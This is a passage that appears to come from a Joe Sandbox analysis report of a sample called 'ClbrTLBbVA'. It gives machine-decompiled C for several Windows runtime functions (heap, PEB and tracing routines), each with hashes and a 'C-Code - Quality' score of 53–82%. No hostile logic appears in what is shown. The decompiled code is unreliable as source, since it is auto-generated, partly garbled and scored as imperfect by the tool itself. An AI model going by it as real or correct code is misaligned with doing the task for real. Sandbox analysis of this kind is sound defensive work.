                                        				if(_t89 == 0 ||  *((char*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0x28)) != 0) {
                                        					goto L4;
                                        				} else {
                                        					E016C2280(_t82 + 0xe0, _t82 + 0xe0);
                                        					 *(_t85 - 4) =  *(_t85 - 4) & 0x00000000;
                                        					__eflags =  *((char*)(_t82 + 0xe5));
                                        					if(__eflags != 0) {
                                        						E017788F5(__ebx, _t70, _t78, _t82, __esi, __eflags);
                                        						goto L12;
                                        					} else {
                                        						__eflags =  *((char*)(_t82 + 0xe4));
                                        						if( *((char*)(_t82 + 0xe4)) == 0) {
                                        							 *((char*)(_t82 + 0xe4)) = 1;
                                        							_push(_t82);
                                        							_push( *((intOrPtr*)(_t82 + 0x24)));
                                        							E016EAFD0();
                                        						}
                                        						while(1) {
                                        							_t60 = _t82 + 8;
                                        							 *(_t85 - 0x2c) = _t60;
                                        							_t68 =  *_t60;
                                        							_t80 = _t60[1];
                                        							 *(_t85 - 0x28) = _t68;
                                        							 *(_t85 - 0x24) = _t80;
                                        							while(1) {
                                        								L10:
                                        								__eflags = _t80;
                                        								if(_t80 == 0) {
                                        									break;
                                        								}
                                        								_t84 = _t68;
                                        								 *(_t85 - 0x30) = _t80;
                                        								 *(_t85 - 0x24) = _t80 - 1;
                                        								asm("lock cmpxchg8b [edi]");
                                        								_t68 = _t84;
                                        								 *(_t85 - 0x28) = _t68;
                                        								 *(_t85 - 0x24) = _t80;
                                        								__eflags = _t68 - _t84;
                                        								_t82 =  *((intOrPtr*)(_t85 + 8));
                                        								if(_t68 != _t84) {
                                        									continue;
                                        								}
                                        								__eflags = _t80 -  *(_t85 - 0x30);
                                        								if(_t80 !=  *(_t85 - 0x30)) {
                                        									continue;
                                        								}
                                        								__eflags = _t80;
                                        								if(_t80 == 0) {
                                        									break;
                                        								}
                                        								_t63 = 0;
                                        								 *(_t85 - 0x34) = 0;
                                        								_t84 = 0;
                                        								__eflags = 0;
                                        								while(1) {
                                        									 *(_t85 - 0x3c) = _t84;
                                        									__eflags = _t84 - 3;
                                        									if(_t84 >= 3) {
                                        										break;
                                        									}
                                        									__eflags = _t63;
                                        									if(_t63 != 0) {
                                        										L40:
                                        										_t84 =  *_t63;
                                        										__eflags = _t84;
                                        										if(_t84 != 0) {
                                        											_t84 =  *(_t84 + 4);
                                        											__eflags = _t84;
                                        											if(_t84 != 0) {
                                        												 *0x179b1e0(_t63, _t82);
                                        												 *_t84();
                                        											}
                                        										}
                                        										do {
                                        											_t60 = _t82 + 8;
                                        											 *(_t85 - 0x2c) = _t60;
                                        											_t68 =  *_t60;
                                        											_t80 = _t60[1];
                                        											 *(_t85 - 0x28) = _t68;
                                        											 *(_t85 - 0x24) = _t80;
                                        											goto L10;
                                        										} while (_t63 == 0);
                                        										goto L40;
                                        									}
                                        									_t69 = 0;
                                        									__eflags = 0;
                                        									while(1) {
                                        										 *(_t85 - 0x38) = _t69;
                                        										__eflags = _t69 -  *0x17984c0;
                                        										if(_t69 >=  *0x17984c0) {
                                        											break;
                                        										}
                                        										__eflags = _t63;
                                        										if(_t63 != 0) {
                                        											break;
                                        										}
                                        										_t66 = E01779063(_t69 * 0xc +  *((intOrPtr*)(_t82 + 0x10 + _t84 * 4)), _t80, _t82);
                                        										__eflags = _t66;
                                        										if(_t66 == 0) {
                                        											_t63 = 0;
                                        											__eflags = 0;
                                        										} else {
                                        											_t63 = _t66 + 0xfffffff4;
                                        										}
                                        										 *(_t85 - 0x34) = _t63;
                                        										_t69 = _t69 + 1;
                                        									}
                                        									_t84 = _t84 + 1;
                                        								}
                                        								__eflags = _t63;
                                        							}
                                        							 *((intOrPtr*)(_t82 + 0xf4)) =  *((intOrPtr*)(_t85 + 4));
                                        							 *((char*)(_t82 + 0xe5)) = 1;
                                        							 *((char*)(_t85 - 0x1d)) = 1;
                                        							L12:
                                        							 *(_t85 - 4) = 0xfffffffe;
                                        							E016A922A(_t82);
                                        							_t53 = E016C7D50();
                                        							__eflags = _t53;
                                        							if(_t53 != 0) {
                                        								_t56 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                        							} else {
                                        								_t56 = 0x7ffe0386;
                                        							}
                                        							__eflags =  *_t56;
                                        							if( *_t56 != 0) {
                                        								_t56 = E01778B58(_t82);
                                        							}
                                        							__eflags =  *((char*)(_t85 - 0x1d));
                                        							if( *((char*)(_t85 - 0x1d)) != 0) {
                                        								__eflags = _t82 -  *0x17986c0; // 0x12407b0
                                        								if(__eflags != 0) {
                                        									__eflags = _t82 -  *0x17986b8; // 0x0
                                        									if(__eflags == 0) {
                                        										_t79 = 0x17986bc;
                                        										_t72 = 0x17986b8;
                                        										goto L18;
                                        									}
                                        									__eflags = _t56 | 0xffffffff;
                                        									asm("lock xadd [edi], eax");
                                        									if(__eflags == 0) {
                                        										E016A9240(_t68, _t82, _t82, _t84, __eflags);
                                        									}
                                        								} else {
                                        									_t79 = 0x17986c4;
                                        									_t72 = 0x17986c0;
                                        									L18:
                                        									E016D9B82(_t68, _t72, _t79, _t82, _t84, __eflags);
                                        								}
                                        							}
                                        							goto L5;
                                        						}
                                        					}
                                        				}
                                        			}



















                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 19a84dd075c3022e3035c7e66029a8b971a5bce18d7a62d7f94cab00c7015d2f
                                        • Instruction ID: 60f794543763f671c92daf68b10a51ed0a0f7c191090a150fcbc8d45352c19d0
                                        • Opcode Fuzzy Hash: 19a84dd075c3022e3035c7e66029a8b971a5bce18d7a62d7f94cab00c7015d2f
                                        • Instruction Fuzzy Hash: E6317A71A04245DFDB26DB6CC888BADBBF1BB49318FA8815DC5046B342C334AD80CB92
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 60%
                                        			E016D1DB5(intOrPtr __ecx, intOrPtr* __edx, intOrPtr* _a4) {
                                        				char _v8;
                                        				intOrPtr _v12;
                                        				intOrPtr _v16;
                                        				intOrPtr* _v20;
                                        				void* _t22;
                                        				char _t23;
                                        				void* _t36;
                                        				intOrPtr _t42;
                                        				intOrPtr _t43;
                                        
                                        				_v12 = __ecx;
                                        				_t43 = 0;
                                        				_v20 = __edx;
                                        				_t42 =  *__edx;
                                        				 *__edx = 0;
                                        				_v16 = _t42;
                                        				_push( &_v8);
                                        				_push(0);
                                        				_push(0);
                                        				_push(6);
                                        				_push(0);
                                        				_push(__ecx);
                                        				_t36 = ((0 | __ecx !=  *((intOrPtr*)( *[fs:0x30] + 8))) - 0x00000001 & 0xc0000000) + 0x40000002;
                                        				_push(_t36);
                                        				_t22 = E016CF460();
                                        				if(_t22 < 0) {
                                        					if(_t22 == 0xc0000023) {
                                        						goto L1;
                                        					}
                                        					L3:
                                        					return _t43;
                                        				}
                                        				L1:
                                        				_t23 = _v8;
                                        				if(_t23 != 0) {
                                        					_t38 = _a4;
                                        					if(_t23 >  *_a4) {
                                        						_t42 = L016C4620(_t38,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _t23);
                                        						if(_t42 == 0) {
                                        							goto L3;
                                        						}
                                        						_t23 = _v8;
                                        					}
                                        					_push( &_v8);
                                        					_push(_t23);
                                        					_push(_t42);
                                        					_push(6);
                                        					_push(_t43);
                                        					_push(_v12);
                                        					_push(_t36);
                                        					if(E016CF460() < 0) {
                                        						if(_t42 != 0 && _t42 != _v16) {
                                        							L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t43, _t42);
                                        						}
                                        						goto L3;
                                        					}
                                        					 *_v20 = _t42;
                                        					 *_a4 = _v8;
                                        				}
                                        				_t43 = 1;
                                        				goto L3;
                                        			}












                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                        • Instruction ID: 11b0b7572066b32704b00e93c6f673bed36a14cb5574b1bfd946722cbef24d01
                                        • Opcode Fuzzy Hash: 113d149f2ee32d0cf172cc5618c6b00e5ec00d0f660e83749918783638c296a2
                                        • Instruction Fuzzy Hash: 2D215172A00119EFD725CF9ACC84EABBBBDEF86650F154059EA0597210DB74AE41CBA0
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 53%
                                        			E016C0050(void* __ecx) {
                                        				signed int _v8;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				void* __ebp;
                                        				intOrPtr* _t30;
                                        				intOrPtr* _t31;
                                        				signed int _t34;
                                        				void* _t40;
                                        				void* _t41;
                                        				signed int _t44;
                                        				intOrPtr _t47;
                                        				signed int _t58;
                                        				void* _t59;
                                        				void* _t61;
                                        				void* _t62;
                                        				signed int _t64;
                                        
                                        				_push(__ecx);
                                        				_v8 =  *0x179d360 ^ _t64;
                                        				_t61 = __ecx;
                                        				_t2 = _t61 + 0x20; // 0x20
                                        				E016D9ED0(_t2, 1, 0);
                                        				_t52 =  *(_t61 + 0x8c);
                                        				_t4 = _t61 + 0x8c; // 0x8c
                                        				_t40 = _t4;
                                        				do {
                                        					_t44 = _t52;
                                        					_t58 = _t52 & 0x00000001;
                                        					_t24 = _t44;
                                        					asm("lock cmpxchg [ebx], edx");
                                        					_t52 = _t44;
                                        				} while (_t52 != _t44);
                                        				if(_t58 == 0) {
                                        					L7:
                                        					_pop(_t59);
                                        					_pop(_t62);
                                        					_pop(_t41);
                                        					return E016EB640(_t24, _t41, _v8 ^ _t64, _t52, _t59, _t62);
                                        				}
                                        				asm("lock xadd [esi], eax");
                                        				_t47 =  *[fs:0x18];
                                        				 *((intOrPtr*)(_t61 + 0x50)) =  *((intOrPtr*)(_t47 + 0x19c));
                                        				 *((intOrPtr*)(_t61 + 0x54)) =  *((intOrPtr*)(_t47 + 0x1a0));
                                        				_t30 =  *((intOrPtr*)( *[fs:0x30] + 0x50));
                                        				if(_t30 != 0) {
                                        					if( *_t30 == 0) {
                                        						goto L4;
                                        					}
                                        					_t31 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22c;
                                        					L5:
                                        					if( *_t31 != 0) {
                                        						_t18 = _t61 + 0x78; // 0x78
                                        						E01778A62( *(_t61 + 0x5c), _t18,  *((intOrPtr*)(_t61 + 0x30)),  *((intOrPtr*)(_t61 + 0x34)),  *((intOrPtr*)(_t61 + 0x3c)));
                                        					}
                                        					_t52 =  *(_t61 + 0x5c);
                                        					_t11 = _t61 + 0x78; // 0x78
                                        					_t34 = E016D9702(_t40, _t11,  *(_t61 + 0x5c),  *((intOrPtr*)(_t61 + 0x74)), 0);
                                        					_t24 = _t34 | 0xffffffff;
                                        					asm("lock xadd [esi], eax");
                                        					if((_t34 | 0xffffffff) == 0) {
                                        						 *0x179b1e0(_t61);
                                        						_t24 =  *((intOrPtr*)( *((intOrPtr*)( *((intOrPtr*)(_t61 + 4))))))();
                                        					}
                                        					goto L7;
                                        				}
                                        				L4:
                                        				_t31 = 0x7ffe0386;
                                        				goto L5;
                                        			}




















                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 0522bddff4b50c9dc6faf32cb050c1c9d2d833f8c601074d7b84fb395daeb107
                                        • Instruction ID: ce917401226cdfec4adc4b318bbb3fe81e436ed6766206962c6f52881b8fa06a
                                        • Opcode Fuzzy Hash: 0522bddff4b50c9dc6faf32cb050c1c9d2d833f8c601074d7b84fb395daeb107
                                        • Instruction Fuzzy Hash: 7E318E35701B04CFD722CB28CD44B66B7E5FF89714F15456DE59687B90EB35A802CB50
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 77%
                                        			E01726C0A(signed short* __ecx, signed char __edx, signed char _a4, signed char _a8) {
                                        				signed short* _v8;
                                        				signed char _v12;
                                        				void* _t22;
                                        				signed char* _t23;
                                        				intOrPtr _t24;
                                        				signed short* _t44;
                                        				void* _t47;
                                        				signed char* _t56;
                                        				signed char* _t58;
                                        
                                        				_t48 = __ecx;
                                        				_push(__ecx);
                                        				_push(__ecx);
                                        				_t44 = __ecx;
                                        				_v12 = __edx;
                                        				_v8 = __ecx;
                                        				_t22 = E016C7D50();
                                        				_t58 = 0x7ffe0384;
                                        				if(_t22 == 0) {
                                        					_t23 = 0x7ffe0384;
                                        				} else {
                                        					_t23 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                        				}
                                        				if( *_t23 != 0) {
                                        					_t24 =  *0x1797b9c; // 0x0
                                        					_t47 = ( *_t44 & 0x0000ffff) + 0x30;
                                        					_t23 = L016C4620(_t48,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t24 + 0x180000, _t47);
                                        					_t56 = _t23;
                                        					if(_t56 != 0) {
                                        						_t56[0x24] = _a4;
                                        						_t56[0x28] = _a8;
                                        						_t56[6] = 0x1420;
                                        						_t56[0x20] = _v12;
                                        						_t14 =  &(_t56[0x2c]); // 0x2c
                                        						E016EF3E0(_t14, _v8[2],  *_v8 & 0x0000ffff);
                                        						_t56[0x2c + (( *_v8 & 0x0000ffff) >> 1) * 2] = 0;
                                        						if(E016C7D50() != 0) {
                                        							_t58 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                        						}
                                        						_push(_t56);
                                        						_push(_t47 - 0x20);
                                        						_push(0x402);
                                        						_push( *_t58 & 0x000000ff);
                                        						E016E9AE0();
                                        						_t23 = L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t56);
                                        					}
                                        				}
                                        				return _t23;
                                        			}












                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: adf89cc6b263efd3537ff4dd1f6ea0f62ec11d623a1965721675a3622de30fcc
                                        • Instruction ID: 76c13843b4a96dd8783d04089869c1934a0742fcffba8833f9dd839dfca9603e
                                        • Opcode Fuzzy Hash: adf89cc6b263efd3537ff4dd1f6ea0f62ec11d623a1965721675a3622de30fcc
                                        • Instruction Fuzzy Hash: DE21ABB2A00655AFD715DB68D884E2AB7B8FF48700F0400AAF905C7790D634ED51CBA8
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 82%
                                        			E016E90AF(intOrPtr __ecx, void* __edx, intOrPtr* _a4) {
                                        				intOrPtr* _v0;
                                        				void* _v8;
                                        				signed int _v12;
                                        				intOrPtr _v16;
                                        				char _v36;
                                        				void* _t38;
                                        				intOrPtr _t41;
                                        				void* _t44;
                                        				signed int _t45;
                                        				intOrPtr* _t49;
                                        				signed int _t57;
                                        				signed int _t58;
                                        				intOrPtr* _t59;
                                        				void* _t62;
                                        				void* _t63;
                                        				void* _t65;
                                        				void* _t66;
                                        				signed int _t69;
                                        				intOrPtr* _t70;
                                        				void* _t71;
                                        				intOrPtr* _t72;
                                        				intOrPtr* _t73;
                                        				char _t74;
                                        
                                        				_t65 = __edx;
                                        				_t57 = _a4;
                                        				_t32 = __ecx;
                                        				_v8 = __edx;
                                        				_t3 = _t32 + 0x14c; // 0x14c
                                        				_t70 = _t3;
                                        				_v16 = __ecx;
                                        				_t72 =  *_t70;
                                        				while(_t72 != _t70) {
                                        					if( *((intOrPtr*)(_t72 + 0xc)) != _t57) {
                                        						L24:
                                        						_t72 =  *_t72;
                                        						continue;
                                        					}
                                        					_t30 = _t72 + 0x10; // 0x10
                                        					if(E016FD4F0(_t30, _t65, _t57) == _t57) {
                                        						return 0xb7;
                                        					}
                                        					_t65 = _v8;
                                        					goto L24;
                                        				}
                                        				_t61 = _t57;
                                        				_push( &_v12);
                                        				_t66 = 0x10;
                                        				if(E016DE5E0(_t57, _t66) < 0) {
                                        					return 0x216;
                                        				}
                                        				_t73 = L016C4620(_t61,  *((intOrPtr*)( *[fs:0x30] + 0x18)), 8, _v12);
                                        				if(_t73 == 0) {
                                        					_t38 = 0xe;
                                        					return _t38;
                                        				}
                                        				_t9 = _t73 + 0x10; // 0x10
                                        				 *((intOrPtr*)(_t73 + 0xc)) = _t57;
                                        				E016EF3E0(_t9, _v8, _t57);
                                        				_t41 =  *_t70;
                                        				if( *((intOrPtr*)(_t41 + 4)) != _t70) {
                                        					_t62 = 3;
                                        					asm("int 0x29");
                                        					_push(_t62);
                                        					_push(_t57);
                                        					_push(_t73);
                                        					_push(_t70);
                                        					_t71 = _t62;
                                        					_t74 = 0;
                                        					_v36 = 0;
                                        					_t63 = E016DA2F0(_t62, _t71, 1, 6,  &_v36);
                                        					if(_t63 == 0) {
                                        						L20:
                                        						_t44 = 0x57;
                                        						return _t44;
                                        					}
                                        					_t45 = _v12;
                                        					_t58 = 0x1c;
                                        					if(_t45 < _t58) {
                                        						goto L20;
                                        					}
                                        					_t69 = _t45 / _t58;
                                        					if(_t69 == 0) {
                                        						L19:
                                        						return 0xe8;
                                        					}
                                        					_t59 = _v0;
                                        					do {
                                        						if( *((intOrPtr*)(_t63 + 0xc)) != 2) {
                                        							goto L18;
                                        						}
                                        						_t49 =  *((intOrPtr*)(_t63 + 0x14)) + _t71;
                                        						 *_t59 = _t49;
                                        						if( *_t49 != 0x53445352) {
                                        							goto L18;
                                        						}
                                        						 *_a4 =  *((intOrPtr*)(_t63 + 0x10));
                                        						return 0;
                                        						L18:
                                        						_t63 = _t63 + 0x1c;
                                        						_t74 = _t74 + 1;
                                        					} while (_t74 < _t69);
                                        					goto L19;
                                        				}
                                        				 *_t73 = _t41;
                                        				 *((intOrPtr*)(_t73 + 4)) = _t70;
                                        				 *((intOrPtr*)(_t41 + 4)) = _t73;
                                        				 *_t70 = _t73;
                                        				 *(_v16 + 0xdc) =  *(_v16 + 0xdc) | 0x00000010;
                                        				return 0;
                                        			}


























                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                        • Instruction ID: 33543b6b64138acd080dffbcb30c3e0662490db798f377cf7d1210629126c6a4
                                        • Opcode Fuzzy Hash: 6bfd702525c1db8ef159ef8001ebf0bb6a8fccc454e16ed8d2a19b71faa45fc1
                                        • Instruction Fuzzy Hash: 352180B1A01315EFDB21DF59C848AAAFBF8EF54754F15896EE949A7200D330ED01CB90
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 59%
                                        			E016D3B7A(void* __ecx) {
                                        				signed int _v8;
                                        				char _v12;
                                        				intOrPtr _v20;
                                        				intOrPtr _t17;
                                        				intOrPtr _t26;
                                        				void* _t35;
                                        				void* _t38;
                                        				void* _t41;
                                        				intOrPtr _t44;
                                        
                                        				_t17 =  *0x17984c4; // 0x0
                                        				_v12 = 1;
                                        				_v8 =  *0x17984c0 * 0x4c;
                                        				_t41 = __ecx;
                                        				_t35 = L016C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t17 + 0x000c0000 | 0x00000008,  *0x17984c0 * 0x4c);
                                        				if(_t35 == 0) {
                                        					_t44 = 0xc0000017;
                                        				} else {
                                        					_push( &_v8);
                                        					_push(_v8);
                                        					_push(_t35);
                                        					_push(4);
                                        					_push( &_v12);
                                        					_push(0x6b);
                                        					_t44 = E016EAA90();
                                        					_v20 = _t44;
                                        					if(_t44 >= 0) {
                                        						E016EFA60( *((intOrPtr*)(_t41 + 0x20)), 0,  *0x17984c0 * 0xc);
                                        						_t38 = _t35;
                                        						if(_t35 < _v8 + _t35) {
                                        							do {
                                        								asm("movsd");
                                        								asm("movsd");
                                        								asm("movsd");
                                        								_t38 = _t38 +  *((intOrPtr*)(_t38 + 4));
                                        							} while (_t38 < _v8 + _t35);
                                        							_t44 = _v20;
                                        						}
                                        					}
                                        					_t26 =  *0x17984c4; // 0x0
                                        					L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), _t26 + 0xc0000, _t35);
                                        				}
                                        				return _t44;
                                        			}













                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: cf1494e977733a160a8be60aa44705acd9567b1493217a83a2e9d1a5577de8ce
                                        • Instruction ID: 0240dbf1748e67cf4e2f53d485abf763f6f7570474d797495eb00e844c4042df
                                        • Opcode Fuzzy Hash: cf1494e977733a160a8be60aa44705acd9567b1493217a83a2e9d1a5577de8ce
                                        • Instruction Fuzzy Hash: FC2180B2A00119EFC710DF58CD81BAABBBDFB44618F154168E904AB251D771AD068B94
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 80%
                                        			E01726CF0(void* __edx, intOrPtr _a4, short _a8) {
                                        				char _v8;
                                        				char _v12;
                                        				char _v16;
                                        				char _v20;
                                        				char _v28;
                                        				char _v36;
                                        				char _v52;
                                        				void* __ebx;
                                        				void* __edi;
                                        				void* __esi;
                                        				void* __ebp;
                                        				signed char* _t21;
                                        				void* _t24;
                                        				void* _t36;
                                        				void* _t38;
                                        				void* _t46;
                                        
                                        				_push(_t36);
                                        				_t46 = __edx;
                                        				_v12 = 0;
                                        				_v8 = 0;
                                        				_v20 = 0;
                                        				_v16 = 0;
                                        				if(E016C7D50() == 0) {
                                        					_t21 = 0x7ffe0384;
                                        				} else {
                                        					_t21 = ( *[fs:0x30])[0x50] + 0x22a;
                                        				}
                                        				if( *_t21 != 0) {
                                        					_t21 =  *[fs:0x30];
                                        					if((_t21[0x240] & 0x00000004) != 0) {
                                        						if(E016C7D50() == 0) {
                                        							_t21 = 0x7ffe0385;
                                        						} else {
                                        							_t21 = ( *[fs:0x30])[0x50] + 0x22b;
                                        						}
                                        						if(( *_t21 & 0x00000020) != 0) {
                                        							_t56 = _t46;
                                        							if(_t46 == 0) {
                                        								_t46 = 0x1685c80;
                                        							}
                                        							_push(_t46);
                                        							_push( &_v12);
                                        							_t24 = E016DF6E0(_t36, 0, _t46, _t56);
                                        							_push(_a4);
                                        							_t38 = _t24;
                                        							_push( &_v28);
                                        							_t21 = E016DF6E0(_t38, 0, _t46, _t56);
                                        							if(_t38 != 0) {
                                        								if(_t21 != 0) {
                                        									E01727016(_a8, 0, 0, 0,  &_v36,  &_v28);
                                        									L016C2400( &_v52);
                                        								}
                                        								_t21 = L016C2400( &_v28);
                                        							}
                                        						}
                                        					}
                                        				}
                                        				return _t21;
                                        			}




















                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 4f7d7d71576e2a6cd1625e37fe7e976a1db99a1ba1b1c407c0d7c72154d8e3a7
                                        • Instruction ID: 2dd194476af1e0da9f116f702f59f27c2451b2c21d035696832499e089bf8dcb
                                        • Opcode Fuzzy Hash: 4f7d7d71576e2a6cd1625e37fe7e976a1db99a1ba1b1c407c0d7c72154d8e3a7
                                        • Instruction Fuzzy Hash: ED21D3729006999BDB11DF28C944B67FBECEF91640F04055AFD40C7251EB34D58AC6A2
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 67%
                                        			E0177070D(signed int* __ecx, signed int __edx, void* __eflags, signed int _a4, signed int _a8) {
                                        				char _v8;
                                        				intOrPtr _v11;
                                        				signed int _v12;
                                        				intOrPtr _v15;
                                        				signed int _v16;
                                        				intOrPtr _v28;
                                        				void* __ebx;
                                        				char* _t32;
                                        				signed int* _t38;
                                        				signed int _t60;
                                        
                                        				_t38 = __ecx;
                                        				_v16 = __edx;
                                        				_t60 = E017707DF(__ecx, __edx,  &_a4,  &_a8, 2);
                                        				if(_t60 != 0) {
                                        					_t7 = _t38 + 0x38; // 0x29cd5903
                                        					_push( *_t7);
                                        					_t9 = _t38 + 0x34; // 0x6adeeb00
                                        					_push( *_t9);
                                        					_v12 = _a8 << 0xc;
                                        					_t11 = _t38 + 4; // 0x5de58b5b
                                        					_push(0x4000);
                                        					_v8 = (_a4 << 0xc) + (_v16 - ( *__ecx & _v16) >> 4 <<  *_t11) + ( *__ecx & _v16);
                                        					E0176AFDE( &_v8,  &_v12);
                                        					E01771293(_t38, _v28, _t60);
                                        					if(E016C7D50() == 0) {
                                        						_t32 = 0x7ffe0380;
                                        					} else {
                                        						_t32 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
                                        					}
                                        					if( *_t32 != 0 && ( *( *[fs:0x30] + 0x240) & 0x00000001) != 0) {
                                        						_t21 = _t38 + 0x3c; // 0xc3595e5f
                                        						E017614FB(_t38,  *_t21, _v11, _v15, 0xd);
                                        					}
                                        				}
                                        				return  ~_t60;
                                        			}














                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                        • Instruction ID: 86a5834614d7c590da4ab65887f16414e1f7bc1e573884c541971ea7b9adf55e
                                        • Opcode Fuzzy Hash: 16b9495bd7cfc8dc207f06a58ad33f13931981def28ffdf8d69df6cf9eebd83e
                                        • Instruction Fuzzy Hash: 792134362042009FDB05DF1CC884B6AFBA5EFD1310F04856DF9959B385C730D819CB91
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        C-Code - Quality: 82%
                                        			E01727794(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4, unsigned int _a8, void* _a12) {
                                        				intOrPtr _v8;
                                        				intOrPtr _v12;
                                        				intOrPtr _t21;
                                        				void* _t24;
                                        				intOrPtr _t25;
                                        				void* _t36;
                                        				short _t39;
                                        				signed char* _t42;
                                        				unsigned int _t46;
                                        				void* _t50;
                                        
                                        				_push(__ecx);
                                        				_push(__ecx);
                                        				_t21 =  *0x1797b9c; // 0x0
                                        				_t46 = _a8;
                                        				_v12 = __edx;
                                        				_v8 = __ecx;
                                        				_t4 = _t46 + 0x2e; // 0x2e
                                        				_t36 = _t4;
                                        				_t24 = L016C4620(__ecx,  *((intOrPtr*)( *[fs:0x30] + 0x18)), _t21 + 0x180000, _t36);
                                        				_t50 = _t24;
                                        				if(_t50 != 0) {
                                        					_t25 = _a4;
                                        					if(_t25 == 5) {
                                        						L3:
                                        						_t39 = 0x14b1;
                                        					} else {
                                        						_t39 = 0x14b0;
                                        						if(_t25 == 6) {
                                        							goto L3;
                                        						}
                                        					}
                                        					 *((short*)(_t50 + 6)) = _t39;
                                        					 *((intOrPtr*)(_t50 + 0x28)) = _t25;
                                        					_t11 = _t50 + 0x2c; // 0x2c
                                        					 *((intOrPtr*)(_t50 + 0x20)) = _v8;
                                        					 *((intOrPtr*)(_t50 + 0x24)) = _v12;
                                        					E016EF3E0(_t11, _a12, _t46);
                                        					 *((short*)(_t50 + 0x2c + (_t46 >> 1) * 2)) = 0;
                                        					if(E016C7D50() == 0) {
                                        						_t42 = 0x7ffe0384;
                                        					} else {
                                        						_t42 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x22a;
                                        					}
                                        					_push(_t50);
                                        					_t19 = _t36 - 0x20; // 0xe
                                        					_push(0x403);
                                        					_push( *_t42 & 0x000000ff);
                                        					E016E9AE0();
                                        					_t24 = L016C77F0( *((intOrPtr*)( *[fs:0x30] + 0x18)), 0, _t50);
                                        				}
                                        				return _t24;
                                        			}














                                        Memory Dump Source
                                        • Source File: 0000000B.00000002.346103337.0000000001680000.00000040.00001000.00020000.00000000.sdmp, Offset: 01680000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_11_2_1680000_ClbrTLBbVA.jbxd
                                        Similarity
                                        • API ID:
                                        • String ID:
                                        • API String ID:
                                        • Opcode ID: 1bef0efe8093052243622fa01c999cca5ad9087b7bbe93b0b2decdf264339074
                                        • Instruction ID: 5ffe8b97a2049d2153e3013f0cf1789ad9491c86a7077b842f287de51562e3e7
